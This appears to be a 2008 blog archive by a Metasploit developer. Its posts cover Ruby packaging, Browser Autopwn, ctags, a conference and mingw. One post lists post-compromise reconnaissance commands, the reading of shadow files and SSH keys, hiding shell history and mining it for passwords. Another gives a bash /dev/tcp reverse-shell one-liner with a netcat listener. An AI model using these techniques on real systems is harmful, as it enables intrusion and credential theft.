Sunday, December 07, 2008


The Ubuntu package ruby1.8 does not install an executable called ruby. It is expected that users install the package ruby which depends on ruby1.8 and installs a single file: a symlink called /usr/bin/ruby that points to /usr/bin/ruby1.8.

Wednesday, November 19, 2008

Metasploit 3.2 released

Despite a number of delays and HDM's slave-driving schedule, The Metasploit Framework version 3.2 was officially released today. My main contributions include reliable bind, reverse, and findsock payloads for PHP script vulnerabilities and Browser Autopwn, a web client fingerprinting exploit machine.

I will post more about Browser Autopwn, including some step-by-step explanations of how I use it, in the coming days.

Sunday, November 09, 2008


As far as I can tell, it is impossible to determine whether an ActiveX object created by classid actually works without just calling specific methods of that control and catching any exceptions. It doesn't seem to matter whether it was created with an <object> tag, or through javascript's document.createElement("object") or document.write("<object...>"). Internet Explorer turns anything with an id attribute into a property of document, and yet if you have

<object id="foo" classid="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" /> advertises no property or method that is not available from an object with no classid.

For those of you playing at home, yes this classid is one of the vulnerable ActiveX controls used in the MDAC / ie_createobject exploits. If the object actually got instantiated correctly and we can talk to it, typeof( returns "unknown" rather than the "undefined" returned for properties that don't exist. So if we know a specific method that the ActiveX implements, we can check to make sure it worked using that. It is unfortunate, then, that there does not seem to be a standard method or property that all ActiveX objects must implement. Unless I'm missing something, because of the lack of a universal method or property, we cannot generically determine whether an ActiveX control created in this way was successfully instantiated. Thus, my "solution" for now is to save a method to test along with the classid. If this doesn't work, I just might give up on browser_autopwn's fingerprinting altogether and simply throw every single exploit at the client. And also maybe shoot myself. I really hate IE.

Thursday, October 30, 2008

Tag, you're it

When I started writing ruby I missed the convenience of a tags file for jumping around in vim to different parts of a project. After a bit of digging I found rtags to replace my beloved exuberant-ctags. Today I updated my metasploit trunk and, since it had been awhile since I had updated tags, I also ran rtags. Normally rtags is slow. Running it in the metasploit source tree typically takes several minutes. Today it seemed to hit infinite loops in multiple files, taking more than ten minutes on a single file before I killed it, added that file to the exclude list, ran it again and walked away for a while. After running into this a dozen times or so over the course of the day, I decided to switch tactics. As it turns out, exuberant-ctags has support for ruby, and probably has had it since before I started using rtags.

root framework3 # time ctags --exclude '.svn' \
--exclude=documentation/ --exclude=external/ \
--exclude=data --recurse .

real 0m0.742s
user 0m0.616s
sys 0m0.092s


Tuesday, October 21, 2008


While attending SecTor, I finally met HD Moore in person after having been a core developer for Metasploit for almost eight months. I had been introduced to him at Defcon a couple of years ago but we didn't actually talk so it doesn't count. Over beers, he asked me to co-present "Metasploit Prime," a discussion of new features available in the upcoming Metasploit 3.2-release. The release itself will be announced in the next few days. Slides(pdf) and video (wmv) for that presentation are now available. The video is actually just audio over the slides, which is somewhat disappointing. This is a gripe I've had with Blackhat for many years and Sector made the same mistake. Regardless of that little issue, Sector was a blast; I learned some stuff and had a great time in Toronto hanging out with HD, Jay Beale, Mark Fabro, and a bunch of other incredibly smart guys. SecTor is much smaller than Defcon (which is the only other security conference I've been to) and I really liked the tighter knit crowd -- it makes it much easier to meet people. It was considerably less technical but I enjoyed it nonetheless. At Defcon, I mostly just hung out with people I already knew because the crowds were so daunting while at Sector, it was easy to meet the rockstar presenters as well as lesser-known attending geniuses. Because of my experience at Sector, I will certainly look at smaller conferences in a new light.

Saturday, July 05, 2008

100 UNIX commands to issue on other people's systems

In response to Halvar Flake's request...

I'm not sure about 100, but there are a few that I use on any new system, mostly just basics that are useful on any multi-user environment: ifconfig -a, netstat -pan --inet, uname -a, w, id, mount, ps auxww.

These tell you a lot about the system and where you might go from there for further exploitation. ifconfig, like ipconfig on Windows, can tell you if the system has a NIC on another network and netstat can tell you if it's talking to one. It's important to note that options to netstat vary from one OS to another -- the above options will list all AF_INET sockets along with associated process IDs on Linux without doing DNS lookups. On Solaris and AIX it is not possible to see PIDs and the command to list all AF_INET sockets without doing DNS lookups is netstat -an -finet. uname tells you the OS name and kernel version. w (or its cousin who) will let you know if someone might be watching. id is whoami on steroids; it gives uid, gid, and a list of groups you belong to. mount tells you how the system's storage is layed out and whether there are any removable drives attached at the moment. ps lists processes and the argument tells it to list all of them, including arguments, with the owner's username. If you're lucky, sometimes you see things like this:

root 21810 0.0 0.4 6984 2452 pts/10 S+ 21:13 0:00 mysql -uroot -ppassword

Then we come to interesting files. Obviously /etc/passwd and /etc/shadow are of interest. But so are slightly more obscure things like /home/*/.ssh/id_rsa (private keys) and /tmp/ssh-*/* (ssh-agent auth sockets). I mentioned some abuses of these files about a year and a half ago. I suggest a viewing of HD Moore and Valsmith's Blackhat 2007 talk, Tactical Exploitation for some more fun things to do with ssh and kerberos.

Finding interesting files can sometimes be a problem, so we have find to help us out. For instance, if you want to list all of the binaries you have permission to read with the setuid bit set: find / -perm +0400 2>/dev/null. All files with password or passwd in their name: find / -iname '*passwd*' -or -iname '*password*'.

If you worry about leaving commands in a history file, you'll probably want to unset HISTFILE. On the other hand, sometimes the history helps an attacker, too. In bash the command history lists all of the commands in the history file. So history | grep -A1 '^ssh' and history | grep -A1 '^su' can often yield passwords when the user whose account you've compromised doesn't pay attention to make sure the password prompt actually came up before typing.

A few more commands that are really cool but are less likely to be installed include: lsof and screen.

Tuesday, March 11, 2008

Minimal indeed

Mingw, or Minimal GNU for Windows, is a really cool project. The idea is to have a gcc that will run anywhere gcc will run and can make Windows executables. It does this well, giving programmers the ability to link native Windows libraries in a non-windows environment. It differs from the standard gcc in a significant way that I discovered this evening: order of arguments is quite important. Whereas standard gcc will accept "gcc code_that_uses_math_dot_h.c -lm" and "gcc -lm code_that_uses_math_dot_h.c" as meaning exactly the same thing, mingw32-gcc is not so forgiving.

egypt@bastet ~ $ cat mintest.c
#if defined( _WIN32 )
#include <winsock2.h>
typedef int SOCKET;
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>

#define PORT 1234

int main () {
struct sockaddr_in saddr;
SOCKET client;
#if defined( _WIN32 )
WSAStartup(0x101, &w);
printf("Hello world\n");
#if defined( _WIN32 )
return 0;
egypt@bastet ~ $ mingw32-gcc -lws2_32 mintest.c -o mintest.exe
/tmp/cc7dCAKg.o:mintest.c:(.text+0x29): undefined reference to `_WSAStartup@8'
/tmp/cc7dCAKg.o:mintest.c:(.text+0x41): undefined reference to `_WSACleanup@0'
collect2: ld returned 1 exit status
egypt@bastet ~ (1) $ ls -l mintest.exe
ls: cannot access mintest.exe: No such file or directory
egypt@bastet ~ $ mingw32-gcc mintest.c -lws2_32 -o mintest.exe
egypt@bastet ~ $ ls -l mintest.exe
-rwxr-xr-x 1 egypt egypt 13K Mar 11 21:50 mintest.exe*
egypt@bastet ~ $ file mintest.exe
mintest.exe: MS-DOS executable PE for MS Windows (console) Intel 80386 32-bit
egypt@bastet ~ $

The moral of the story is this: if you're having trouble getting mingw to properly link a library, put the .c as your first argument.

/me grumbles

Tuesday, January 29, 2008


Bash can read and write pipes on a specific file descriptor, like so:``echo foo >&2'' which prints to file descriptor 2 and ``cat <&2'' which reads from file descriptor 2. Just like in the rest of the unix world, file descriptor 0 is stdin, 1 is stdout, and 2 is stderr unless they've been redirected. In fact, we're not limited to 0, 1, and 2 -- we have up to 1023 to play with. To open a new one, we use the syntax: ``cat 3<>foo.txt <&3'' which has the same effect as ``cat foo.txt'', but piped through file descriptor 3.

Bash also has a little known feature that allows opening a tcp connection with the special filename: /dev/tcp/hostname/port. ``echo foo > /dev/tcp/'' will perform a DNS lookup for, attempt to connect to TCP port 9999 of the resulting IP address, and send the string "foo" to the socket.

Putting these things together...
targetbox / $ /bin/bash 3<>/dev/tcp/ <&3 >&3 &

and we've got a shell shoveler in pure bash, no outside executables. Catch it with:
evil / $ nc -l -p 9999

Same thing; pure bash, now with no spaces for getting around input filters:

Monday, January 28, 2008


Base64 encoding is just that: encoding. It's a way to ensure that text with strange characters can be sent on the wire in an unambiguous, portable manner. It is not, and was never meant to be, encryption. There is no added security by encoding a password with base64. Just like there is no added security by encoding a password with rot13. It is no more than obfuscation; perhaps less than obfuscation since base64 on the wire sticks out and says, "Hey, look at me!" Taking an authentication mechanism that is secured by real encryption and sending it back out in plaintext (or, equivalently, encoded with base64) is ridiculous.

So don't ever do that.